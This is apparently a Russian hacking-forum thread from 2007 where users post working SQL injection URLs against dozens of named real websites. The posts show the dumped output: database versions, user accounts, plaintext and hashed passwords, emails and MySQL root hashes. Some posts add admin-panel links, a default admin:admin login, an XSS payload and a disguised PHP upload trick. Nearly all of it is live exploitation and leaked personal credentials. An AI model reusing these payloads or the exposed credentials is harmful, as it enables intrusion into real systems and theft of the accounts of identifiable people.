http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE(),0x3a,Column_name),4+from+info rmation_schema.columns/*

fobofob

21.12.2007, 20:47

5taY3r

21.12.2007, 21:31

www.twinind.comhttp://twinind.com/catalog_detail.php?id=-274+union+select+1,2,3,4,5,6,convert(concat_ws(0x3 a,version(),user(),database())+using+latin1),8,9,1 0,11,12,13/*4.1.14:root@localhost:catalog

www.kelleykreations.comhttp://www.kelleykreations.com/catalog/catalog.php?id=-70+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9/*4.0.27-standard:kelleykr_storeus@localhost:kelleyk

www.truelifetaxidermy.comhttp://www.truelifetaxidermy.com/catalog.php?id=-16+union+select+1,convert(concat_ws(0x3a,version() ,user(),database())+using+latin1),3,4/*4.1.14-standard-log:user1161039@64.224.109.41:truelifetaxidermycom

www.upeda.orghttp://www.upeda.org/view.php?id=-73+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3/*4.1.22-community-nt:upeda@dsiis:upeda

www.ipodpalace.comhttp://www.ipodpalace.com/view.php?ID=-125+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14/*4.1.22-standard:ipodpala_ipod@localhost:ipodpala_news

min7

22.12.2007, 02:05

http://adam.fulara.com/e.php?g=gallery&nr=-33+union+select+1,concat_ws(char(58,58),user(),dat abase(),version()),3,4/*
fulara@localhost::fulara::4.0.12-standard
Есть табличка users, но никаких колонок не смог подобрать...
http://www.umka.dp.ua/price.php?g=-7+union+select+1,2,concat_ws(char(58,58),user(),da tabase(),version()),4,5,6,7,8,9/*
umapalata@localhost::umapalata::5.0.27-log
Здесь всё очень удобно выводится))
users->login,passwords,email
довольно много интересных мыл, есть админские от разных сайтов)

Nea7

22.12.2007, 12:49

Код:

http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_n ame,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14 +from+information_schema.columns+where+column_name +like+0x257061737325+limit+0,1/*&cat=

5 мускул,есть 3 бд с паролями админов,сайт сам фигня,но интересно другое а именно CMSка ;)

p.s ни один пароль к админке не подходит,кто найдет акк с доступом тому от меня плюсики :)

там двойная авторизация http://odin-torg.com/admin/, если вводить admin:admin попадаем на
http://odin-torg.com/admin/general_admin/start.php
а там данные от u60555_odin.general_admin, но проверка ip . и кавычка экранируется =\
'SELECT id FROM general_admin WHERE login = 'логин' AND pass = 'пасс\'/*' AND ip_address = 'твой ip' не может быть выполнена.

ElteRUS

22.12.2007, 13:41

pechatnick.com

http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.45-log/u8421_2/u8421@10.10.223.234

http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,login,pass,email,icq )+from+users+limit+3000,1/*

логин/пароль/мейл/уин больше 3000 юзеров
chaxter/881515/2v@bk.ru/

min7

22.12.2007, 20:46

http://www.wollrus.ru/catalog/zzz.php?b=4&tip=-2+union+select+1,concat_ws(char(58,58),user(),data base(),version()),3,4,5,6,7,8,9/*
wollrus9@localhost::wollrus9_shvey::4.1.22-log
Ничё не нашёл.

http://www.wegcode.be/wetgrp.php?g=-1+union+select+1,2,3,concat_ws(char(58,58),user(), database(),version()),5,6/*
wegcode_main@localhost::wegcode_main::4.0.23-standard
Есть таблица admin, но там нашёл только id и name...

FoxMALDER

23.12.2007, 05:33

http://ability.aol.com/ability/index.php?ID=1&catID=-1/**/union/**/select/**/11111,22222/**from/**/user

good :D
from name (USER) ;)
Да ты профи... :D
А попробуй так:
http://ability.aol.com/ability/index.php?ID=1&catID=-1/**/union/**/select/**/11111,22222/**from/**/MAZAFAKA_TEAM_MUSLEMEN
P.S.: Ты же сам себя на*бал! :D
P.P.S: http://ability.aol.com/ability/authors.php?authorID=-8+union+select+1,2,3,4,5,6,7,8+from+ability_catego ries/*
http://ability.aol.com/ability/authors.php?authorID=-8+union+select+1,2,3,4,5,6,7,8+from+ability_author s/*
http://ability.aol.com/ability/authors.php?authorID=-8+union+select+1,2,3,4,5,6,7,8+from+ability_links/*

Momiji

23.12.2007, 06:15

www.easternmarket.net
http://www.easternmarket.net/index.php?id=fe&fe=-53+union+select+1,concat_ws(0x3,user(),database(), version()),email,phone,5,6+from+market+limit+4,2/*
User: easternm@lsh408.van.ca.siteprotect.com
Database: easternm
Version: 5.0.22-Debian_0ubuntu6.06.2-log

http://www.easternmarket.net/index.php?id=fe&fe=-53+union+select+1,2,concat(table_schema,0x3a,table _name,0x3a,column_name),4,5,6+from+information_sch ema.columns/*

n0ne

24.12.2007, 01:23

price.ua

http://price.ua/firm.php?fid=6+and(1=2)+union+select+1,concat(logi n,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64+from+user/*

4Dfx

24.12.2007, 09:56

http://www.valleys.ru/work.php?id=-1+union+select+1,2,3,4,5,6/*
intelco1_maxanda@localhostintelco1_intelcom4.1.2 2-log
http://www.etikk.no/kurs.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
etikk@213.236.241.190etikk4.1.20

http://www.iocisono.com/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
IOCISONO@LOCALHOSTE-COMMERCE4.0.24_DEBIAN-10SARGE2-LOG
http://www.vfs.com/curriculum.php?id=-1+union+select+1,2,3,4,5,6/*
wp_users:
id
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
http://www.vfs.com/blog/wp-login.php

JIyka

25.12.2007, 00:13

http://www.frankdelaney.com/work.php?id=13+union+select+1,concat(version(),0x3 a,user()),3,4,5,6,7,8/*

~EviL~

25.12.2007, 00:30

http://seksmagazin.ru/show/?prod=5016+UNION+SELECT+1,2,3,concat(user(),0x3a,v ersion(),0x3a,database()),5,6,7,8,9,10,11,12,13/*
http://onlinesexshop.ru/tovar/?id=5167+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10 ,11,12,13/*
http://www.loverland.ru/addbasket.php?action=add&id=-1047+UNION+SELECT+version()/*
http://www.comingsoon.net/news/movienews.php?id=-40208+UNION+SELECT+version()/*

ElteRUS

25.12.2007, 00:33

http://www.itmnews.ru/itmnews.php?s=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6,7,8,9/*

4.1.20-lk-log/itmnewsru/itmnewsru@localhost

-----------------------------------------------------------------------------

kafanews.com

http://www.kafanews.com/index.phtml?link=1&nn=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1/*

5.0.27-log/kafa_news/kafa_news@localhost

http://www.kafanews.com/index.phtml?link=1&nn=-1+union+select+1,concat_ws(0x2F,kto,passwd),3,4,5, 6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+banka_login+limit+1,1/*

имя/пароль
Юлия Ташкина/>kbz

Другие интересные таблицы:

имя таблицы (столбцы) пример

kasper_login (login,passwd) helena/kbyudbcnbrf
loris_login (login,passwd) admin/lorislogin
forums_user (username,password,email,icq) Natalia/34b5231473658a8da04b80b7f850ea17/natasha@kafanews.kafa.crimea.ua/210387998
w_klients_affiliates (username,password,email) Nat/bd953afe4994579f871806f408c7ccd3/natasha@kafanews.kafa.crimea.ua
user (name,pass,mail) root/1/
users (name,pass,email,icq) Максим/adala/maximus111@bigmir.net/
people (name,pass) qwerty/123456

Lesnoy_chelovek

25.12.2007, 00:46

http://www.latek.com.ua/index.php?page=produkt.php&subcat=99+union+select+1,2,3,4,5,id,7,8+from+user/*

тупо не могу подобрать колонки

ThreeD

25.12.2007, 01:05

www.bizzz.com

http://www.bizzz.com/index.php?action=browse&country_id=&c ategory_id=365+union+select+id,concat(id,0x3a,user name,0x3a,pass word),3,4,5,6,7,8,9,10+from+me mbers+limit+825,1000/*

rank_site8@p3slh023.shr.phx3.secureserver.net:4.1. 22-max-log:rank_site8

Поигравшись с лимитом, можно вывести остальных.
__________________________________________
www.awiscz.com

http://www.awiscz.com/we b/web1_en.php?id=-57+union+select+1,2,3,4,concat(i d,login,p assword),6+from+user s+limit+0,1/*

4.1.22-log:awiscz_com:awisc.com@localhost

Админка: www.awiscz.com/admin/
Login: admin
Pass: admin
__________________________________________
www.impresia.ro

http://www.impresia.ro/index.php?tab=12&id=-12+union+select+1,concat(versio n(),0x3a,user(),0x 3a,d atabase()),3,4/*

4.1.22-standard:impresia_web@localhost:impresia_web
__________________________________________
www.nordicdvd.net

http://www.nordicdvd.net/index.php?lang_id=en&title_id=3180+union+select+conc at(USER(),0x3a,VERSION( ),0x3a,DA TABASE()),1/*

kvernan_oebdvd@localhost:4.1.22-standard:kvernan_kvernan

Присутствует таблица kvernan
__________________________________________
http://videos.baise-porno.net

http://videos.baise-porno.net/payment.php?id=-34+union+select+1,2,3,4,5,6,7,convert(concat(USER( ),0x3a,VER SION(),0x3a,DAT ABASE())+using+latin1),9,10/*

kabia06@localhost:4.1.11-Debian_4sarge7-log:kabia06_privilege
__________________________________________

Добавлено

Может кому будет интересно (в чем я, собственно, не сомневаюсь) ;)

Покрутите:

http://www.casino-friends.com/news-casino.php?id=5'

~EviL~

25.12.2007, 01:33

http://www.uprava.org/section.php?id=-34+UNION+SELECT+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7/*
http://www.happyland-drink.ru/brands.php?id=-2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

~EviL~

25.12.2007, 02:23

http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,version(),3,4,5,6,7/*
http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,concat(user_id,0x3a,user_name,0x 3a,password),3,4,5,6,7+FROM+user+LIMIT+0,1/*
1:semenov:6b19beeaedade171ecc320ddd87f7ae6::dancer

ThreeD

25.12.2007, 02:42

http://www.seattlepokertournaments.com/casino.php?id=-25+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7,8,9,10,11,12,13/*

4.0.27-standard-log:db93557881:dbo93557881@74.208.16.119

Red_Red1

25.12.2007, 02:52

2 Lesnoy_chelovek
http://www.latek.com.ua/index.php?page=produkt.php&subcat=99+union+select+1,2,3,log,5,pas,7,8+from+us er/*
:)

ThreeD

25.12.2007, 03:18

Пройдёмся по казино.
Пять близнецов штоле? :) Не могу увидеть где выводится инфа. Ногами не бить- в скулях совсем зелен и несведущь. :)

http://www.casinos-virtuels.net/description-casino.php?id=23+orde r+by+28/*

http://www.casino-jeu.net/casino.php?id=54+order+b y+28/*

http://www.annuaire-casino.net/casino.php?id=9+or der+by+28/*

http://www.01-casino.com/casino.php?id=17+ order+by+28/*

http://www.jeu-casino-online.com/casino.php?id=4+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,2 5,26,27,28/*

Scipio

25.12.2007, 03:37

минусенг в параметре поставь и увидишь:
http://www.jeu-casino-online.com/casino.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28/*

SWAT

25.12.2007, 06:02

http://ballshooter.com/games/?c=category&category=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from +partners/*

http://www.tctux.com/php/showContent.php?linkid=-6+union+select+VERSION()/*

http://www.7casinoonline.com/it/poker.php?ID=-1682+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*

http://www.jeu-casino-online.com/poker.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

4Dfx

25.12.2007, 09:41

http://www.big6.com/showarticle.php?id=-1+union+select+1,2,3,4,5/*
poll_user:
user_id
username
userpass
session
last_visit
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(%20user_id,%20CHAR(32,58,32) ,%20username,%20CHAR(32,58,32),%20userpass),2,3,4, 5+from+poll_user/*
Админка http://www.big6.com/admin/
admin : d158b1d234953b66bfc119f17f800b7b
wp_users:
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(ID,%20CHAR(32,58,32),user_lo gin,%20CHAR(32,58,32),user_pass,%20CHAR(32,58,32), %20user_email),2,3,4,5+from+wp_users/*
http://www.big6.com/blog/wp-login.php
admin : c49938ea11089d6a7783a28469b64edf
sue : e7e9ec3723447a642f762b2b6a15cfd7
laura : 73bc892f0b1ea86bf8e39656ad1e0d26
mike : bfd9f0cc586164634e1b9a255069ca5f
carrie : 2ccf2e8d12b57c2b2a58af053033dcd0
theresa : 85fb5505ee3d6f3976a00cb248822d38

otmorozok428

25.12.2007, 11:05

www.100baz.ru

http://www.100baz.ru/info.php?id=54+AND+23%3d(SELECT+COUNT(table_name)+ FROM+information_schema.tables)

Количество таблиц в базе (вместе со служебными таблицами information_schema.tables) - 23.
Юзерские таблицы:
bag
client
region
rubrika
t_news
tovar

JIyka

25.12.2007, 12:37

http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,5 8+from+users/*

fRg

25.12.2007, 13:17

Если цензура будет не очень строгой, то будет видео по Франции

А пока...

artslivres.comhttp://artslivres.com/ShowArticles.php?TypeAffichage=ParEditeur&NEdition=35&Editeur=-1+union+select+1,concat_ws(0x3a,version(),database (),user())/* 4.0.25-standard-log:artslivres001:artslivres001@10.0.65.166

etgarim.co.il - кто знает иврит - копайте глубже!http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(), database(),user())+using+latin1),3,4,5/*&type=game4.1.11-standard:etgarim_db:etgarim_user@localhost

Юзеры:http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,username,p assword,email)+using+latin1),3,4,5+from+users+limi t+0,1/*&type=game

~EviL~

25.12.2007, 13:25

http://www.politcom.ru/article.php?id=-5492+UNION+SELECT+concat(user(),0x3a,database(),0x 3a,version())/*
W_POLIT@195.42.160.28:W_POLIT:4.1.20-1.GMS

2 JIyka
http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,4,5,concat(id,0x3a,user,0x3a, pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58+from+users/*
1:amro:b4af804009cb036a4ccdc33431ef9ac9

fRg

25.12.2007, 15:15

cavi.dkhttp://www.cavi.dk/showarticle.php?id=-1/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version (),database(),user()),0x71),0x71),4,5,6/*&newsletter_id=8 4.1.18:cavi_nyhedsbrev:cavidb@localhost
с фильтрами постарались...

studyport.infohttp://studyport.info/viewdetails.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/* 4.1.22-log : portua_studybank : portua_studybank@apollo

iwsf.com - International Water Ski Federationhttp://www.iwsf.com/dbheadlines/showarticle.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9/*4.0.27-standard-log:db204576552:dbo204576552@74.208.16.37

urummage.com http://www.urummage.com/articles/showarticle.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())/* 4.1.22-standard-log:urummag_urummag:urummag_dba@web1.infinology.co m

ZAMUT

25.12.2007, 16:18

Вот и от меня немного...
www.maxnormal.tv
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,version(),user(),database()),0x71),0x71),4 ,5,6+from+%20%20users+limit+0,1+--+4.1.11-Debian_4sarge7:africandopeco@10.1.3.41:africandope _co_za_-_waddy
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,username,password),0x71),0x71),4,5,6+from+ users+limit+0,1+--+matt : 1a1dc91c907325c69271ddf0c944bc72 : pass
www.deltarescue.tv
http://www.deltarescue.tv/deltarescue/war/item.php?id=-1+union+select+version(),2,3,4,5,6,7+--+4.0.24_Debian-10sarge2-log:deltarescue@localhost:deltarescue
www.llbn.tv
http://www.llbn.tv/index.php?option=com_na_content&task=view&id=55-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,version(),user(),database()),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31+--+4.1.10a-Max:hzhnkrhe@localhost:llbn-netadventist-org
www.canallatino.tv
http://www.canallatino.tv/x2/index.php?id=2&seccion=3&noticia=1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT (concat_ws(0x3a,version(),user(),database()),0x71) ,0x71),4,5,6,7,8,9,10,11,12,13,14,15,16+--+.1.15-Debian_1-log:new_users@localhost:new_users'>.1.15-Debian_1-log:new_users@localhost:n...
www.music.indiana.edu
http://www.music.indiana.edu/apps/prelude/new/index.php?id=4495'+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database()),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21+--+5.0.22:sitevisitor@localhost:musevents
www.stnersess.edu
http://www.stnersess.edu/schoolFacultyInfo/alumni/details.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15+--+4.0.27-standard:stnerses_db@localhost:stnerses_db
ieee.metu.edu
http://ieee.metu.edu/alaattin/v2/detay.php?catid=9&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,version(),user(),database()),0x71),0x71),3,4 ,5,6,7+--+4.1.11-Debian_4sarge7:alaattin@localhost:alaattindb

n0ne

25.12.2007, 18:32

zebratelecom.com

http://www.zebratelecom.com/private/news.php?id=244&prn=-3684+union+select+1/*

test@localhost::4.1.20::zebra_private2007

Та же фигня и на zebra.ru, и на zebratelecom.ru, короче на всех зеркалах.

~EviL~

25.12.2007, 19:13

http://www.domkino.spb.ru/description.php?id=-572+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(user(),0 x3a,database(),0x3a,version()),11,12/*
domkinospbru@78.108.81.211:domkinospbru:4.1.21-log

http://www.domkino.spb.ru/description.php?id=-572+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(name,0x3 a,password,0x3a,email),11,12+FROM+user+LIMIT+0,1/*
Шурик:ahin:sshurik@online.ru
Андрей:andrey:nag@parnas.spb.ru
Sergh:ss:sergh@finec.ru
Джек-потрошитель:jack:jack@mail.ru

fobofob

25.12.2007, 21:20

159932

25.12.2007, 21:37

www.transfermarketweb.com
http://www.transfermarketweb.com/?action=read&idsel=-8190+union+select+1,2,3,4,convert(concat(user,0x3a ,password),binary),6,7,8,9,0,1,2,3,4+from+mysql.us er/*
root:681a9db507f25aea:my22lu75
http://www.transfermarketweb.com/admin/

Nea7

25.12.2007, 22:26

Довольно крупный сайт...

код:

http://www.zavarka.com/texts/cgi-bin/show.cgi?id=-381+union+select+1,2,3,4,5,6,7,8/*&p=0

жаль 4 мускул :(

p.s тоже самое на зеркале в домене ru

на сайте есть скрипт аплоада "валлпаперов" , щас линк не могу дать так как сайт не грузит =\ аплоадим значит нашу "картинку"... нам напишет что-то вроде - "после проверки администратором ваша картинка будет размещена на сайте"... мы же не будем ждать этого, а сразу перейдем к нашей пикче, благо директории открыты для просмотра :
http://www.zavarka.ru/wallpapers/data/New/606426_jpe9.php

.Begemot.

25.12.2007, 22:51

glasmaher.com

http://www.glasmaher.com/index.php?id=999+union+select+0,concat(USER(),0x3a ,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15/*&lang=si

USER:gmaher_optika@localhost
VERSION:4.1.15-standard-log
DATABASE:gmaher_glasmaher

Есть таблица admin и столбец id.
http://www.glasmaher.com/index.php?id=999+union+select+0,concat(id),2,3,4,5 ,6,7,8,9,10,11,12,13,14,15+from+admin/*&lang=si
Админка
http://www.glasmaher.com/admin/

159932

25.12.2007, 23:46

www.thehaus.ez-net.com
http://thehaus.ez-net.com/index.php?ent=5321+union+select+1,2,3,4,5,6,conver t(passwd,binary)+from+admins/*

~EviL~

26.12.2007, 01:10

http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(user(),0x3a,database(), 0x3a,version()),4,5,6,7/*
hrman@localhost:hrani:5.0.45

http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(username,0x3a,password, 0x3a,email),4,5,6,7+FROM+users+LIMIT+0,1/*
admin:0fbd3cb40a66bda2bb951eb88e4bf460:info@hranit e.info::franzela

Saint-Sky

26.12.2007, 02:43

http://www.ns.ui.edu

http://www.ns.ui.edu/mipa/wap/?view=berita&id=-1'+UNION+SELECT+1,2,convert(user()+USING+latin1),4 ,5,6/*

wwwns@localhost:wwwns:4.1.11

S1ash

26.12.2007, 04:25

вот что получилось... скудненько, но всё же

http://cards.udaff.com/viewcat.php?id=-1+UNION+SELECT+database(),version(),user(),databas e(),version()/*

x88x

26.12.2007, 11:40

ну я тож, дабы не отставать выкладываю:

QSRWEB.COM

http://www.qsrweb.com/research.php?rc_id=16+union+select+USER(),2,3,4,5, 6,7,8,9

atmmarketplace@localhost

из таблиц нашел только members...

fRg

26.12.2007, 15:07

askort.comhttp://www.askort.com/?item_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,version(),database(),user()),0x71),0x71),3,4/* 4.1.11:maxivanov_askort:maxivanov_askort@localhost

newuniversity.org - University of Californiahttp://www.newuniversity.org/checkDB.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/* 5.37-standard-log:newunive_NewU:newunive_newu@localhost

latestchess.com - Шахматы - сила!http://latestchess.com/showArticle.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6/* 4.0.16:lciin000_lc:lciin000_lc@localhost

vcharkarn.com - что-то индийское походу...http://www.vcharkarn.com/include/article/showarticle.php?aid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21/* 5.0.22:db17937a:us17937a@localhost

Из таблиц кое-чего:administrator
contact_list
email_confirm
exam_users_ID
member_infoВ табе administrator есть поля:admin_id,login,password

AFoST

26.12.2007, 16:26

alouettecanada.ca
http://www.alouettecanada.ca/press_releases-f.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19/*

.Begemot.

26.12.2007, 16:49

statistik.basketball-bundesliga.de

http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,concat(USER(),0x3a,VE RSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

USER:bblstats@localhost
VERSION::4.1.11-Debian_4sarge7
DATABASE:usr_web1_1

Вот тут админка еще:
http://statistik.basketball-bundesliga.de/admin/

ThreeD

26.12.2007, 17:45

mypspwebsite.com

http://mypspwebsite.com/order.php?id=-5+union+select+1,2,concat(user,0x3a,password),4,5, 6,7,8,9,10,11+from+mysql.user/*

4.1.21-standard: psp :itl@localhost

root:42da70e829fb058d
itl_safeboating0:14ed81343ed8ed5b
mycms:042b624758e485a0
itl:26a3e0e614cf0724
accomm:5210de0d20737caa
lynx:32335d666b6b535d
ArthurJenkins001:6180cc7a02f27b63
licence:71801f1a6ca21bc2
tucantravel:5f42297b6482f1b4
toucan001:0dbe24ad0d0f6594
_____________________________________________
www.moriahhaggadah.com

http://www.moriahhaggadah.com/o rder.php?id=-258+union+select+1,2,3,4,5,concat(version(),0x3a,d atabase(),0x3a,user( )),7,8,9,10,11,12, 13,14, 15/*

5.0.32-Debian_7etch3-log:aistore:aistore@localhost
_____________________________________________
www.traditionalhousedesign.ca

http://www.traditionalhousedesign.ca/order.php?id=-3+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

5.0.45-log:housedesign:housedesign@localhost

ElteRUS

26.12.2007, 20:01

http://www.ugmk.info/?art=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9/*

4.0.26-log/ugmk/ugmk@localhost

тут же XSS в поиске <script>alert()</script>

-----------------------------------------------------------------------------

http://www.uel.ru/newstext.asp?id=-1+or+1=@@version--

Microsoft SQL Server 7.00 - 7.00.1094 (Intel X86) May 29 2003 15:21:25 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.uel.ru/newstext.asp?id=-1+or+1=(select+db_name())-- uel

http://www.uel.ru/newstext.asp?id=-1+or+1=(select+system_user)-- WWW\IUSR_WWW

~EviL~

26.12.2007, 21:11

www.aei.brookings.org

http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat(version(),0x3a,user(),0x3a,database()),15,16,1 7,18,19/*
4.0.25-standard-log:aei_brookings@10.225.135.70:aei_brookings

159932

26.12.2007, 21:37

www.smolbibl.ru
http://www.smolbibl.ru/news.php?Action=FullText&ID=270+union+select+1,concat_ws(0x3a,User,UserName ,UserAccess,UserPass,UserMail,UserFamily)+from+use rs+limit+0,1/*
5.0.45-community
Admin:Андрей:5:dtkbrj,hbnfybz:anmmat@mail.ru :Метелица
login:Admin
pass:dtkbrj,hbnfybz
http://www.smolbibl.ru/admin.php
но пароль не подходит :( ... не знаю что делать ((

~EviL~

26.12.2007, 23:41

http://soft.oszone.net

http://soft.oszone.net/program.php?pid=-30+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version() ,0x3a,user(),0x3a,database()),11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
4.1.22-log:bigmac_soft@localhost:bigmac_soft

ElteRUS

27.12.2007, 01:42

http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,concat_ws(0x2F,cast(version ()+as+binary),cast(database()+as+binary),cast(user ()+as+binary)),6,7,8/*

4.1.14-standard/europa/europa@localhost

-----------------------------------------------------------------------------
art-catalog.ru

http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5/*

4.1.22-log/artcata8_artcatalog/artcata8_Bos37ar@localhost

http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,user_login,user_pa ssword,email),3,4,5+from+users/*

логин/пароль/мейл
valent/valent46/maler@bk.ru

ZAMUT

27.12.2007, 04:14

SexSecrets.ru ^ ^
http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4+--+5.0.26:sexsecrets_ru@localhost:sexsecrets_ru

Таблицка:
phpbb_users
Столбцы:
user_id
username
user_password
http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,user_id,username,u ser_password),3,4+from+phpbb_users+limit+1,1/*
2:Admin:be245c9762fe4ae6f40bbf944e0de243

Mike 007

27.12.2007, 13:28

http://www.dovodchiki-dorma.ru/links/?cat=-1+union+select+user()/*

Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

http://www.tsaritsyno.ru/main.jsp?id=-1+order+by+3/*

heks

27.12.2007, 13:34

http://www.taniec.ilife.pl/para.php?id=-1+order+by+2/*

Mike 007

27.12.2007, 13:45

www.onboard.ru
http://www.onboard.ru/resort/?id=-1+union+select+user()/*

http://s1912.zouo.ru/site.php?id=-1+union+select+user(),2,3/*

Saint-Sky

27.12.2007, 14:05

http://www.taniec.ilife.pl/para.php?id=-1+order+by+2/*

Эта запись ни о чем не говорит, ведь столбцов то - 4.

http://www.taniec.ilife.pl/para.php?id=-1+UNION+SELECT+1,2,3,concat(user(),0x3a,database() ,0x3a,version())/*

taniec_adner@localhost:taniec_taniec:4.1.22-standard

ElteRUS

27.12.2007, 15:08

http://dctel.net/index.php?page=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.0.23a-log/dctel/dctel_user@localhost

-----------------------------------------------------------------------------

http://www.arbicon.ru/news/?id=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.arbicon.ru/news/?id=-1+or+1=(select+db_name())-- portal

